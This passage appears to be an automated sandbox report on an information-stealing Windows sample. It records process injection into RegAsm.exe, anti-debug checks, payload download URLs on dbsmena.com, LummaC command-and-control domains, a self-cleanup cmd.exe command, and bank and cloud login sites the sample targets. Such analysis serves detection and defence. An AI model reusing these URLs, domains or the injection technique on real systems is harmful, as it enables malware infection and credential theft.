Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

4_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	4_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410FBA GetSystemInfo,wsprintfA,

4_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://dbsmena.com/ljhgfsd.exe>\)
Source: IJDHCB.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: IJDHCB.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: IJDHCB.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: R1219056https://dbsmena.com/ljhgfsd.exe1kkkk1219057https://dbsmena.com/vdshfd.exe1kkkk97f0d2d0242908
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2801859666.0000000001445000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000102A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: IJDHCB.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /ljhgfsd.exe
Source: IJDHCB.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: IJDHCB.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: IJDHCB.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: IJDHCB.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: IJDHCB.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: IJDHCB.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: IJDHCB.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: https://dbsmena.com/ljhgfsd.exe
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: IJDHCB.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: IJDHCB.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: IJDHCB.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: IJDHCB.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"6
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe\*
Source: RegAsm.exe, 00000010.00000002.3154731112.000000000102A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1219056\|https://dbsmena.com/ljhgfsd.exe\|1\|kkkk\|1219057\|https://dbsmena.com/vdshfd.exe\|1\|kkkk\|
Source: IJDHCB.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Thttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"
Source: IJDHCB.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(k
Source: IJDHCB.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exes
Source: IJDHCB.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-73757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-73741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-75072

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004476D0 LdrInitializeThunk,

12_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]	4_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]	4_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]	4_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]	4_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

4_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042762E SetUnhandledExceptionFilter,	4_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C0BB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C0BB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C26AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C26AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2380, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02462131 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02462131

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: FBFHJJJDAF.exe, 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8DA008	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11A7008	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CA2008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FBFHJJJDAF.exe "C:\ProgramData\FBFHJJJDAF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IIDHJDGCGDAA" & exit	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040111D cpuid

4_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	4_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	4_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	4_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	4_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	4_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	4_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00427576
